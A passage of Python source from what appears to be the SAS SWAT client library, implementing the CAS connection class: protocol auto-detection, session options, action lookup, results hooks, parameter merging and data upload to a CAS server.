self._dir = set([x for x in super_dir(CAS, self)])
# Pre-populate action set attributes
for asname, value in self._raw_retrieve('builtins.help',
showhidden=True,
_messagelevel='error',
_apptag='UI').items():
self._actionset_classes[asname.lower()] = None
if value is not None:
for actname in value['name']:
self._action_classes[asname.lower() + '.' + actname.lower()] = None
self._action_classes[actname.lower()] = None
# Populate CASTable documentation and method signatures
CASTable._bootstrap(self)
init = CASTable.__init__
if hasattr(init, '__func__'):
init = init.__func__
self.CASTable.__func__.__doc__ = init.__doc__
# Add loadactionset handler to populate actionset and action classes
def handle_loadactionset(conn, results):
''' Force the creation of actionset and action classes '''
if 'actionset' in results:
conn.__getattr__(results['actionset'], atype='actionset')
self.add_results_hook('builtins.loadactionset', handle_loadactionset)
# Set the session name
self._raw_retrieve('session.sessionname', name=self._name,
_messagelevel='error', _apptag='UI')
# Set session options
if sess_opts:
self._raw_retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **sess_opts)
# Set options
self._set_option(print_messages=cf.get_option('cas.print_messages'))
self._set_option(trace_actions=cf.get_option('cas.trace_actions'))
self._set_option(trace_ui_actions=cf.get_option('cas.trace_ui_actions'))
# Add the connection to a global dictionary for use by IPython notebook
type(self).sessions[self._session] = self
type(self).sessions[self._name] = self
def _id_generator():
''' Generate unique IDs within a connection '''
num = 0
while True:
yield num
num = num + 1
self._id_generator = _id_generator()
def _gen_id(self):
''' Generate an ID unique to the session '''
import numpy
return numpy.base_repr(next(self._id_generator), 36)
def _get_server_features(self):
'''
Determine which features are available in the server
Returns
-------
        ( string, tuple, set-of-strings )
            Tuple of server type, server version, and supported feature names
'''
out = set()
info = self._raw_retrieve('builtins.serverstatus', _messagelevel='error',
_apptag='UI')
version = tuple([int(x) for x in info['About']['Version'].split('.')][:2])
stype = info['About']['System']['OS Name'].lower()
# Check for reflection levels feature
res = self._raw_retrieve('builtins.reflect', _messagelevel='error',
_apptag='UI', action='builtins.reflect',
showlabels=False)
if [x for x in res[0]['actions'][0]['params'] if x['name'] == 'levels']:
out.add('reflection-levels')
return stype, version, out
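    # Illustrative return value (hypothetical server): ('linux', (3, 5),
    # {'reflection-levels'}), i.e. (server type, server version, feature set).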
@classmethod
def _detect_protocol(cls, hostname, port, protocol=None, timeout=3):
'''
Detect the protocol type for the given host and port
Parameters
----------
hostname : string or list
The CAS host to connect to.
port : int
The CAS port to connect to.
protocol : string, optional
The protocol override value.
timeout : int, optional
Timeout (in seconds) for checking a protocol
Returns
-------
string
'cas', 'http', or 'https'
'''
if protocol is None:
protocol = cf.get_option('cas.protocol')
if isinstance(hostname, six.string_types):
hostname = re.split(r'\s+', hostname.strip())
if protocol != 'auto':
logger.debug('Protocol specified explicitly: %s' % protocol)
# Try to detect the proper protocol
if protocol == 'auto':
try:
import queue
except ImportError:
import Queue as queue
import socket
import ssl
import threading
for host in hostname:
out = queue.Queue()
logger.debug('Attempting protocol auto-detect on %s:%s', host, port)
def check_cas_protocol():
''' Test port for CAS (binary) support '''
proto = None
try:
cas_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cas_socket.settimeout(timeout)
cas_socket.connect((host, port))
cas_socket.sendall(bytearray([0, 0x53, 0x41, 0x43,
0x10, 0, 0, 0, 0, 0, 0, 0,
0x10, 0, 0, 0,
0, 0, 0, 0,
2, 0, 0, 0,
5, 0, 0, 0]))
if cas_socket.recv(4) == b'\x00SAC':
proto = 'cas'
except Exception:
pass
finally:
cas_socket.close()
out.put(proto)
def check_https_protocol():
''' Test port for HTTPS support '''
proto = None
try:
ssl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_socket.settimeout(timeout)
ssl_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
ssl_conn = ssl_context.wrap_socket(ssl_socket,
server_hostname=host)
ssl_conn.connect((host, port))
ssl_conn.write(('GET /cas HTTP/1.1\r\n'
+ ('Host: %s\r\n' % host)
+ 'Connection: close\r\n'
+ 'User-Agent: Python-SWAT\r\n'
+ 'Cache-Control: no-cache\r\n\r\n')
.encode('utf8'))
except ssl.SSLError as exc:
if 'certificate verify failed' in str(exc):
proto = 'https'
except Exception:
pass
finally:
ssl_socket.close()
out.put(proto)
def check_http_protocol():
''' Test port for HTTP support '''
proto = None
try:
http_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
http_socket.settimeout(timeout)
http_socket.connect((host, port))
http_socket.send(('GET /cas HTTP/1.1\r\n'
+ ('Host: %s\r\n' % host)
+ 'Connection: close\r\n'
+ 'User-Agent: Python-SWAT\r\n'
+ 'Cache-Control: no-cache\r\n\r\n')
.encode('utf8'))
txt = http_socket.recv(16).decode('utf-8').lower()
if txt.startswith('http') and txt.split()[1] != '400':
proto = 'http'
except Exception:
pass
finally:
http_socket.close()
out.put(proto)
checkers = [check_cas_protocol, check_https_protocol, check_http_protocol]
for item in checkers:
threading.Thread(target=item).start()
try:
for i in range(len(checkers)):
proto = out.get(block=True, timeout=timeout)
if proto is not None:
protocol = proto
break
except queue.Empty:
pass
if protocol != 'auto':
logger.debug('Protocol detected: %s', protocol)
break
# No protocol detected
if protocol == 'auto':
if port == 80:
logger.debug('Protocol defaulted by port 80: http')
protocol = 'http'
elif port == 443:
                logger.debug('Protocol defaulted by port 443: https')
protocol = 'https'
else:
logger.debug('No protocol detected: defaulting to \'cas\'')
protocol = 'cas'
return protocol
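    # Illustrative call (hypothetical host): CAS._detect_protocol(['mycashost.com'], 5570)
    # probes the port concurrently with a binary CAS handshake, an HTTPS request,
    # and an HTTP request, returning whichever protocol answers first ('cas',
    # 'https', or 'http') and otherwise falling back to a port-based default.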
def __enter__(self):
''' Enter a context '''
return self
def __exit__(self, type, value, traceback):
''' Exit the context '''
self.retrieve('session.endsession', _apptag='UI', _messagelevel='error')
self.close()
@contextlib.contextmanager
def session_context(self, *args, **kwargs):
'''
Create a context of session options
This method is intended to be used in conjunction with Python's
``with`` statement. It allows you to set CAS session options within
that context, then revert them back to their previous state.
For all possible session options, see the `sessionprop.getsessopt`
CAS action documentation.
Parameters
----------
*args : string / any pairs
Name / value pairs of options in consecutive arguments, name / value
pairs in tuples, or dictionaries.
**kwargs : string / any pairs
Key / value pairs of session options
Examples
--------
>>> conn = swat.CAS()
>>> print(conn.getsessopt('locale').locale)
en_US
>>> with conn.session_context(locale='fr'):
... print(conn.getsessopt('locale').locale)
fr
>>> print(conn.getsessopt('locale').locale)
en_US
'''
state = {}
newkwargs = {}
for key, value in iteroptions(*args, **kwargs):
state[key.lower()] = list(self.retrieve('sessionprop.getsessopt',
_messagelevel='error',
_apptag='UI',
name=key.lower()).values())[0]
newkwargs[key.lower()] = value
self.retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **newkwargs)
yield
self.retrieve('sessionprop.setsessopt', _messagelevel='error',
_apptag='UI', **state)
def get_action_names(self):
'''
Return the list of action classes
Returns
-------
list of strings
'''
return self._action_classes.keys()
def get_actionset_names(self):
'''
Return the list of actionset classes
Returns
-------
list of strings
'''
return self._actionset_classes.keys()
def has_action(self, name):
'''
Does the given action name exist?
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
boolean
'''
return name.lower() in self._action_classes
def has_actionset(self, name):
'''
Does the given actionset name exist?
Parameters
----------
name : string
The name of the CAS action set to look for.
Returns
-------
boolean
'''
return name.lower() in self._actionset_classes
def get_action(self, name):
'''
Get the CAS action instance for the given action name
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
:class:`CASAction` object
'''
return self.__getattr__(name, atype='action')
def get_action_class(self, name):
'''
Get the CAS action class for the given action name
Parameters
----------
name : string
The name of the CAS action to look for.
Returns
-------
:class:`CASAction`
'''
return self.__getattr__(name, atype='action_class')
def get_actionset(self, name):
'''
Get the CAS action set instance for the given action set name
Parameters
----------
name : string
The name of the CAS action set to look for.
Returns
-------
:class:`CASActionSet` object
'''
return self.__getattr__(name, atype='actionset')
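    # Illustrative usage of the lookup helpers above ('table' / 'table.fetch'
    # are examples and must be available on the connected server):
    #   conn.has_actionset('table')                # -> True on a typical server
    #   fetch = conn.get_action('table.fetch')     # CASAction instance
    #   tbl_actions = conn.get_actionset('table')  # CASActionSet instance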
def __dir__(self):
# Short-circuit PyCharm's introspection
if 'get_names' in [x[3] for x in inspect.stack()]:
return list(self._dir)
return list(sorted(list(self._dir) + list(self.get_action_names())))
def __dir_actions__(self):
return list(sorted(self.get_action_names()))
def __dir_members__(self):
return list(sorted(self._dir))
def __str__(self):
args = []
args.append(repr(self._hostname))
args.append(repr(self._port))
if self._username:
args.append(repr(self._username))
return 'CAS(%s, protocol=%s, name=%s, session=%s)' % (', '.join(args),
repr(self._protocol),
repr(self._name),
repr(self._session))
def __repr__(self):
return str(self)
def CASTable(self, name, **kwargs):
'''
Create a CASTable instance
The primary difference between constructing a :class:`CASTable`
object through this method rather than directly, is that the
current session will be automatically registered with the
:class:`CASTable` object so that CAS actions can be called on
it directly.
Parameters
----------
name : string
Name of the table in CAS.
**kwargs : any, optional
Arbitrary keyword arguments. These keyword arguments are
passed to the :class:`CASTable` constructor.
Returns
-------
:class:`CASTable` object
'''
table = CASTable(name, **kwargs)
table.set_connection(self)
return table
def SASFormatter(self):
'''
Create a SASFormatter instance
:class:`SASFormatters` can be used to format Python values using
SAS data formats.
Returns
-------
:class:`SASFormatter` object
'''
return SASFormatter(soptions=self._soptions)
def add_results_hook(self, name, func):
'''
Add a post-processing function for results
The function will be called with two arguments: the CAS connection
object and the :class:`CASResult` object.
Parameters
----------
name : string
Full name of action (actionset.actionname)
func : function
Function to call for result set
See Also
--------
:meth:`del_results_hook`
:meth:`del_results_hooks`
Examples
--------
To add a post-processing function for a particular action, you
specify the fully-qualified action name and a function.
>>> def myfunc(connection, results):
if results and results.get('num'):
results['num'] = math.abs(results['num'])
return results
>>>
>>> s.add_results_hook('myactionset.myaction', myfunc)
'''
name = name.lower()
if name not in self._results_hooks:
self._results_hooks[name] = []
self._results_hooks[name].append(func)
def del_results_hook(self, name, func):
'''
Delete a post-processing function for an action
Parameters
----------
name : string
Full name of action (actionset.actionname)
func : function
The function to remove
See Also
--------
:meth:`add_results_hook`
:meth:`del_results_hooks`
Examples
--------
To remove a post-processing hook from an action, you must specify the
action name as well as the function to remove. This is due to the fact
that multiple functions can be registered to a particular action.
>>> s.del_results_hook('myactionset.myaction', myfunc)
'''
name = name.lower()
if name in self._results_hooks:
self._results_hooks[name] = [x for x in self._results_hooks[name]
if x is not func]
def del_results_hooks(self, name):
'''
Delete all post-processing functions for an action
Parameters
        ----------
name : string
Full name of action (actionset.actionname)
See Also
--------
:meth:`add_results_hook`
:meth:`del_results_hook`
Examples
--------
The following code removes all post-processing functions registered to
the `myactionset.myaction` action.
>>> s.del_results_hooks('myactionset.myaction')
'''
name = name.lower()
if name in self._results_hooks:
del self._results_hooks[name]
def close(self, close_session=False):
''' Close the CAS connection '''
if close_session:
self.retrieve('session.endsession', _messagelevel='error', _apptag='UI')
errorcheck(self._sw_connection.close(), self._sw_connection)
def terminate(self):
''' End the session and close the CAS connection '''
self.close(close_session=True)
def _set_option(self, **kwargs):
'''
Set connection options
Parameters
        ----------
**kwargs : any
Arbitrary keyword arguments. Each key/value pair will be
set as a connection option.
Returns
-------
True
If all options were set successfully
'''
for name, value in six.iteritems(kwargs):
name = str(name)
typ = errorcheck(self._sw_connection.getOptionType(name),
self._sw_connection)
try:
if typ == 'boolean':
if value in [True, False, 1, 0]:
errorcheck(self._sw_connection.setBooleanOption(name,
value and 1 or 0),
self._sw_connection)
else:
raise SWATError('%s is not a valid boolean value' % value)
elif typ == 'string':
if isinstance(value, (binary_types, text_types)):
errorcheck(self._sw_connection.setStringOption(name, a2n(value)),
self._sw_connection)
else:
errorcheck(self._sw_connection.setStringOption(name, value),
self._sw_connection)
elif typ == 'int32':
errorcheck(self._sw_connection.setInt32Option(name, int32(value)),
self._sw_connection)
elif typ == 'int64':
errorcheck(self._sw_connection.setInt64Option(name, int64(value)),
self._sw_connection)
elif typ == 'double':
errorcheck(self._sw_connection.setDoubleOption(name, float64(value)),
self._sw_connection)
except TypeError:
raise SWATError('%s is not the correct type' % value)
return True
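    # Illustrative call (option names match those applied in __init__ above):
    #   conn._set_option(print_messages=True, trace_actions=False)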
def copy(self):
'''
Create a copy of the connection
The copy of the connection will use the same parameters as ``self``,
but it will create a new session.
Examples
--------
>>> conn = swat.CAS()
>>> print(conn)
CAS(..., session='76dd2bbe-de65-554f-a94f-a5e0e1abfdc8')
>>> conn2 = conn.copy()
>>> print(conn2)
CAS(..., session='19cef586-6997-ae40-b62c-036f44cb60fc')
See Also
--------
:meth:`fork`
Returns
-------
:class:`CAS` object
'''
return type(self)(None, None, prototype=self)
def fork(self, num=2):
'''
Create multiple copies of a connection
The copies of the connection will use the same parameters as ``self``,
but each will create a new session.
Notes
-----
The first element in the returned list is the same object that
the method was called on. You only get `num`-1 copies.
Parameters
----------
num : int, optional
Number of returned connections. The first element of the returned
list is always the object that the fork method was called on.
Examples
--------
The code below demonstrates how to get four unique connections.
>>> conn = swat.CAS()
>>> c1, c2, c3, c4 = conn.fork(4)
>>> c1 is conn
True
>>> c2 is conn
False
See Also
--------
:meth:`copy`
Returns
-------
list of :class:`CAS` objects
'''
output = [self]
for i in range(1, num):
output.append(self.copy())
return output
def _invoke_without_signature(self, _name_, **kwargs):
'''
Call an action on the server
Parameters
----------
_name_ : string
Name of the action.
**kwargs : any, optional
Arbitrary keyword arguments.
Returns
-------
:obj:`self`
'''
if isinstance(self._sw_connection, rest.REST_CASConnection):
errorcheck(self._sw_connection.invoke(a2n(_name_), kwargs),
self._sw_connection)
else:
errorcheck(self._sw_connection.invoke(a2n(_name_),
py2cas(self._soptions,
self._sw_error, **kwargs)),
self._sw_connection)
return self
def _merge_param_args(self, parmlist, kwargs, action=None):
'''
Merge keyword arguments into a parmlist
This method modifies the parmlist *in place*.
Parameters
----------
parmlist : list
Parameter list.
kwargs : dict
Dictionary of keyword arguments.
action : string
Name of the action.
'''
if action is None:
action = ''
if isinstance(kwargs, ParamManager):
kwargs = copy.deepcopy(kwargs.params)
# Short circuit if we can
if not isinstance(kwargs, dict):
return
# See if we have a caslib= parameter
caslib = False
for param in parmlist:
if param['name'] == 'caslib':
caslib = True
break
# kwargs preserving case
casekeys = {k.lower(): k for k in kwargs.keys()}
# Add support for CASTable objects
inputs = None
fetch = {}
uses_inputs = False
uses_fetchvars = False
for param in parmlist:
ptype = param['parmType']
key = param['name']
key = casekeys.get(key, key)
key_lower = key.lower()
# Check for inputs= / fetchvars= parameters
if ptype == 'value_list':
if key_lower == 'inputs':
uses_inputs = True
elif key_lower == 'fetchvars':
uses_fetchvars = True
# Get table object if it exists
tbl = kwargs.get('__table__', None)
# Convert table objects to the proper form based on the argument type
if key in kwargs and isinstance(kwargs[key], CASTable):
if param.get('isTableDef'):
inputs = kwargs[key].get_inputs_param()
fetch = kwargs[key].get_fetch_params()
kwargs[key] = kwargs[key].to_table_params()
elif param.get('isTableName'):
inputs = kwargs[key].get_inputs_param()
fetch = kwargs[key].get_fetch_params()
# Fill in caslib= first
if caslib and 'caslib' not in kwargs and \
kwargs[key].has_param('caslib'):
kwargs['caslib'] = kwargs[key].get_param('caslib')
kwargs[key] = kwargs[key].to_table_name()
elif param.get('isOutTableDef'):
kwargs[key] = kwargs[key].to_outtable_params()
elif param.get('isCasLib') and kwargs[key].has_param('caslib'):
kwargs[key] = kwargs[key].get_param('caslib')
# If a string is given for a table object, convert it to a table object
elif key in kwargs and isinstance(kwargs[key], text_types) and \
param.get('isTableDef'):
kwargs[key] = {'name': kwargs[key]}
elif tbl is not None and param.get('isTableDef') and \
key_lower == 'table' and 'table' not in casekeys:
inputs = tbl.get_inputs_param()
fetch = tbl.get_fetch_params()
kwargs[key] = tbl.to_table_params()
elif tbl is not None and param.get('isTableName') and \
key_lower == 'name' and 'name' not in casekeys:
inputs = tbl.get_inputs_param()
fetch = tbl.get_fetch_params()
if caslib and 'caslib' not in kwargs and tbl.has_param('caslib'):
kwargs['caslib'] = tbl.get_param('caslib')
kwargs[key] = tbl.to_table_name()
# Workaround for columninfo / update which doesn't define table= as
# a table definition.
elif tbl is not None and key_lower == 'table' and \
action.lower() in ['columninfo', 'table.columninfo',
'update', 'table.update'] and \
'table' not in casekeys:
inputs = tbl.get_inputs_param()
kwargs[key] = tbl.to_table_params()
if not uses_inputs:
if inputs and 'vars' not in kwargs:
kwargs[key]['vars'] = inputs
inputs = None
# Apply input variables
if uses_inputs and inputs and 'inputs' not in kwargs:
kwargs['inputs'] = inputs
elif uses_fetchvars and inputs and 'fetchvars' not in kwargs:
kwargs['fetchvars'] = inputs
# Apply fetch parameters
if fetch and action.lower() in ['fetch', 'table.fetch']:
for key, value in fetch.items():
if key in kwargs:
continue
if key == 'sortby' and ('orderby' in kwargs or 'orderBy' in kwargs):
continue
kwargs[key] = value
# Apply inputs= to specific actions that don't support it
if 'table' in kwargs and not uses_inputs and inputs \
and action.lower() in ['partition', 'table.partition',
'save', 'table.save']:
tbl = kwargs['table']
if not isinstance(tbl, dict):
tbl = dict(name=tbl)
tbl['vars'] = inputs
# Fix aggregate action when both inputs= and varspecs= are supplied
if 'table' in kwargs and action.lower() in ['aggregate', 'aggregation.aggregate']:
if 'inputs' in kwargs and 'varspecs' in kwargs:
kwargs.pop('inputs', None)
kwargs.pop('__table__', None)
# Workaround for tableinfo which aliases table= to name=, but
# the alias is hidden.
if action.lower() in ['tableinfo', 'table.tableinfo'] and 'table' in kwargs:
if isinstance(kwargs['table'], CASTable):
kwargs['table'] = kwargs['table'].to_table_params()
if isinstance(kwargs['table'], dict):
if caslib and 'caslib' not in kwargs and kwargs['table'].get('caslib'):
kwargs['caslib'] = kwargs['table']['caslib']
kwargs['table'] = kwargs['table']['name']
# Add current value fields in the signature
for param in parmlist:
if param['name'] in kwargs:
if 'parmList' in param:
self._merge_param_args(param['parmList'], kwargs[param['name']],
action=action)
else:
if isinstance(kwargs[param['name']], text_types):
param['value'] = kwargs[param['name']].replace('"', '\\u0022')
# TODO: This should only happen for binary inputs (i.e., never)
elif isinstance(kwargs[param['name']], binary_types):
# param['value'] = kwargs[param['name']].replace('"', '\\u0022')
pass
else:
param['value'] = kwargs[param['name']]
def _get_action_params(self, name, kwargs):
'''
Get additional parameters associated with the given action
Parameters
----------
name : string
Name of the action being executed.
kwargs : dict
Action parameter dictionary.
Returns
-------
dict
The new set of action parameters.
'''
newkwargs = kwargs.copy()
for value in six.itervalues(kwargs):
if isinstance(value, ActionParamManager):
newkwargs.update(value.get_action_params(name, {}))
return newkwargs
def _invoke_with_signature(self, _name_, **kwargs):
'''
Call an action on the server
Parameters
----------
_name_ : string
Name of the action.
**kwargs : any, optional
Arbitrary keyword arguments.
Returns
-------
dict
Signature of the action
'''
# Get the signature of the action
signature = self._get_action_info(_name_)[-1]
# Check for additional action parameters
kwargs = self._get_action_params(_name_, kwargs)
if signature:
signature = copy.deepcopy(signature)
kwargs = copy.deepcopy(kwargs)
self._merge_param_args(signature.get('params', {}), kwargs, action=_name_)
self._invoke_without_signature(_name_, **kwargs)
return signature
def _extract_dtypes(self, df):
'''
Extract importoptions= style data types from the DataFrame
Parameters
----------
df : pandas.DataFrame
The DataFrame to get types from
Returns
-------
OrderedDict
'''
out = collections.OrderedDict()
for key, value in df.dtypes.iteritems():
value = value.name
if value == 'object':
value = 'varchar'
elif value.startswith('float'):
value = 'double'
elif value.endswith('int64'):
if 'csv-ints' in self.server_features:
value = 'int64'
else:
value = 'double'
elif value.startswith('int'):
if 'csv-ints' in self.server_features:
value = 'int32'
else:
value = 'double'
elif value.startswith('bool'):
if 'csv-ints' in self.server_features:
value = 'int32'
else:
value = 'double'
elif value.startswith('datetime'):
value = 'varchar'
else:
continue
out['%s' % key] = dict(type=value)
return out
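    # Illustrative result (assuming the server does not report 'csv-ints'):
    # a DataFrame with dtypes a=object, b=float64, c=int64, d=bool maps to
    #   OrderedDict(a={'type': 'varchar'}, b={'type': 'double'},
    #               c={'type': 'double'}, d={'type': 'double'})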
def _apply_importoptions_vars(self, importoptions, df_dtypes):
'''
Merge in vars= parameters to importoptions=
Notes
-----
This method modifies the importoptions in-place.
Parameters
----------
importoptions : dict
The importoptions= parameter
df_dtypes : dict or list
The DataFrame data types dictionary
'''
if 'vars' not in importoptions:
importoptions['vars'] = df_dtypes
return
vars = importoptions['vars']
# Merge options into dict vars
if isinstance(vars, dict_types):
for key, value in six.iteritems(df_dtypes):
if key in vars:
for k, v in six.iteritems(value):
vars[key].setdefault(k, v)
else:
vars[key] = value
# Merge options into list vars
else:
df_dtypes_list = []
for key, value in six.iteritems(df_dtypes):
value = dict(value)
value['name'] = key
df_dtypes_list.append(value)
for i, item in enumerate(df_dtypes_list):
if i < len(vars):
if not vars[i]:
vars[i] = item
else:
for key, value in six.iteritems(item):
vars[i].setdefault(key, value)
else:
vars.append(item)
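    # Illustrative merge (dict-style vars=, hypothetical column names):
    #   importoptions = {'vars': {'a': {'format': 'DATE9.'}}}
    #   df_dtypes     = {'a': {'type': 'varchar'}, 'b': {'type': 'double'}}
    # leaves importoptions['vars'] ==
    #   {'a': {'format': 'DATE9.', 'type': 'varchar'}, 'b': {'type': 'double'}}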
def upload(self, data, importoptions=None, casout=None, date_format=None, **kwargs):
'''
Upload data from a local file into a CAS table
The primary difference between this data loader and the other data
loaders on this class is that, in this case, the parsing of the data
is done on the server. This method simply uploads the file as
binary data which is then parsed by `table.loadtable` on the server.
        While the server parsers may not be quite as flexible as Python, they
are generally much faster. Files such as CSV can be parsed on the
server in multiple threads across many machines in the grid.
Notes
-----
This method uses paths that are on the **client side**. This means
you need to use paths to files that are **on the same machine that Python
is running on**. If you want to load files from the CAS server side, you
would use the `table.loadtable` action.
Also, when uploading a :class:`pandas.DataFrame`, the data is exported to
a CSV file, then the CSV file is uploaded. This can cause a loss of
metadata about the columns since the server parser will guess at the
data types of the columns. You can use `importoptions=` to specify more
information about the data.
Parameters
----------
data : string or :class:`pandas.DataFrame`
If the value is a string, it can be either a filename
or a URL. DataFrames will be converted to CSV before
uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
date_format : string, optional
Format string for datetime objects.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Examples
--------
>>> conn = swat.CAS()
>>> out = conn.upload('data/iris.csv')
>>> tbl = out.casTable
>>> print(tbl.head())
sepal_length sepal_width petal_length petal_width species
0 5.1 3.5 1.4 0.2 setosa
1 4.9 3.0 1.4 0.2 setosa
2 4.7 3.2 1.3 0.2 setosa
3 4.6 3.1 1.5 0.2 setosa
4 5.0 3.6 1.4 0.2 setosa
Returns
-------
:class:`CASResults`
'''
delete = False
name = None
df_dtypes = None
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
if importoptions is None:
importoptions = {}
import pandas as pd
if isinstance(data, pd.DataFrame):
import tempfile
with tempfile.NamedTemporaryFile(delete=False, suffix='.csv') as tmp:
delete = True
filename = tmp.name
name = os.path.splitext(os.path.basename(filename))[0]
data.to_csv(filename, encoding='utf-8',
index=False, sep=a2n(',', 'utf-8'),
decimal=a2n('.', 'utf-8'),
date_format=a2n(date_format, 'utf-8'),
line_terminator=a2n('\r\n', 'utf-8'))
df_dtypes = self._extract_dtypes(data)
importoptions['locale'] = 'EN-us'
elif data.startswith('http://') or \
data.startswith('https://') or \
data.startswith('ftp://'):
import certifi
import ssl
import tempfile
from six.moves.urllib.request import urlopen
from six.moves.urllib.parse import urlparse
parts = urlparse(data)
ext = os.path.splitext(parts.path)[-1].lower()
with tempfile.NamedTemporaryFile(delete=False, suffix=ext) as tmp:
delete = True
tmp.write(
urlopen(
data,
context=ssl.create_default_context(cafile=certifi.where())
).read())
filename = tmp.name
if parts.path:
name = os.path.splitext(parts.path.split('/')[-1])[0]
else:
name = os.path.splitext(os.path.basename(filename))[0]
else:
filename = data
name = os.path.splitext(os.path.basename(filename))[0]
# TODO: Populate docstring with table.loadtable action help
filetype = {
'sav': 'spss',
'xlsx': 'excel',
'sashdat': 'hdat',
'sas7bdat': 'basesas',
}
if isinstance(importoptions, (dict, ParamManager)) and \
'filetype' not in [x.lower() for x in importoptions.keys()]:
ext = os.path.splitext(filename)[-1][1:].lower()
if ext in filetype:
importoptions['filetype'] = filetype[ext]
elif len(ext) == 3 and ext.endswith('sv'):
importoptions['filetype'] = 'csv'
kwargs['importoptions'] = importoptions
if df_dtypes:
self._apply_importoptions_vars(importoptions, df_dtypes)
if casout is None:
casout = {}
if isinstance(casout, CASTable):
casout = casout.to_outtable_params()
if isinstance(casout, dict) and 'name' not in casout:
casout['name'] = name
kwargs['casout'] = casout
if isinstance(self._sw_connection, rest.REST_CASConnection):
resp = self._sw_connection.upload(a2n(filename), kwargs)
else:
resp = errorcheck(self._sw_connection.upload(a2n(filename),
py2cas(self._soptions,
self._sw_error,
**kwargs)),
self._sw_connection)
# Remove temporary file as needed
if delete:
try:
os.remove(filename)
except Exception:
pass
return self._get_results([(CASResponse(resp, connection=self), self)])
def upload_file(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload a client-side data file to CAS and parse it into a CAS table
Parameters
----------
data : string
Either a filename or URL.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Returns
-------
:class:`CASTable`
'''
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
out = self.upload(data, importoptions=importoptions,
casout=casout, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return out['casTable']
def upload_frame(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload a client-side data file to CAS and parse it into a CAS table
Parameters
----------
data : :class:`pandas.DataFrame`
DataFrames will be converted to CSV before uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Returns
-------
:class:`CASTable`
'''
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
out = self.upload(data, importoptions=importoptions,
casout=casout, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return out['casTable']
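    # Illustrative usage (hypothetical table name, mirrors the upload() example above):
    #   tbl = conn.upload_frame(pd.DataFrame({'x': [1, 2, 3]}),
    #                           casout={'name': 'mydata'})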
def _raw_invoke(self, _name_, **kwargs):
''' Invoke a CAS action without any parameter checking '''
self._invoke_without_signature(a2n(_name_), **kwargs)
return self
def _raw_retrieve(self, _name_, **kwargs):
''' Call a CAS action without parameter checking and return results '''
try:
# Call the action and compile the results
self._invoke_without_signature(a2n(_name_), **kwargs)
return self._get_results(getnext(self))
except SWATCASActionRetry:
self._invoke_without_signature(a2n(_name_), **kwargs)
return self._get_results(getnext(self))
def invoke(self, _name_, **kwargs):
'''
Call an action on the server
The :meth:`invoke` method only calls the action on the server. It
does not retrieve the responses. To get the responses, you iterate
over the connection object.
Parameters
----------
_name_ : string
Name of the action
**kwargs : any, optional
Arbitrary keyword arguments
Returns
-------
`self`
See Also
--------
:meth:`retrieve` : Calls action and retrieves results
:meth:`__iter__` : Iterates over responses
Examples
--------
The code below demonstrates how you invoke an action on the server and
iterate through the results.
>>> s.invoke('help')
<swat.CAS object at 0x7fab0a9031d0>
>>> for response in s:
... for key, value in response:
... print(key)
... print(value)
builtins
name description
0 addnode Add a node to the server
1 help Lists the available actions
.
.
.
'''
self._invoke_with_signature(a2n(_name_), **kwargs)
return self
def retrieve(self, _name_, **kwargs):
'''
Call the action and aggregate the results
Parameters
----------
_name_ : string
Name of the action
**kwargs : any, optional
Arbitrary keyword arguments
Returns
-------
:class:`CASResults` object
See Also
--------
:meth:`invoke` : Calls action, but does not retrieve results
Examples
--------
The code below demonstrates how you invoke an action on the server and
retrieve the results.
>>> out = s.retrieve('help')
>>> print(out.keys())
['builtins', 'casidx', 'casmeta', 'espact', 'tkacon', 'table', 'tkcsessn',
'tkcstate']
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
Status and performance information is also available on the returned object.
Here is an example of an action call to an action that doesn't exist.
>>> out = s.retrieve('foo')
>>> print(out.status)
'The specified action was not found.'
>>> print(out.severity)
2
>>> print(out.messages)
["ERROR: Action 'foo' was not found.",
'ERROR: The CAS server stopped processing this action because of errors.']
Here is an example that demonstrates the performance metrics that are available.
>>> out = s.retrieve('help')
>>> print(out.performance)
<swat.CASPerformance object at 0x33b1c50>
Performance values are loaded lazily, but you can get a dictionary of
all of them using the ``to_dict`` method.
>>> print(out.performance.to_dict())
{'system_cores': 1152L, 'memory_quota': 303759360L, 'cpu_user_time': 0.014995,
'elapsed_time': 0.004200000000000001, 'system_nodes': 48L,
'memory_system': 432093312L, 'cpu_system_time': 0.018999, 'memory': 150688L,
'memory_os': 294322176L, 'system_total_memory': 4868538236928L}
Rather than having the ``retrieve`` method compile all of the results into one
object, you can control how the responses and results from the server are
handled in your own functions using the ``responsefunc`` or ``resultfunc`` keyword
arguments.
The ``responsefunc`` argument allows you to specify a function that is called for
each response from the server after the action is called. The ``resultfunc``
        is called for each result in a response. These functions cannot be used at
        the same time; if both are specified, only the ``resultfunc`` function is
        used. Below is an example of using a ``responsefunc`` function.
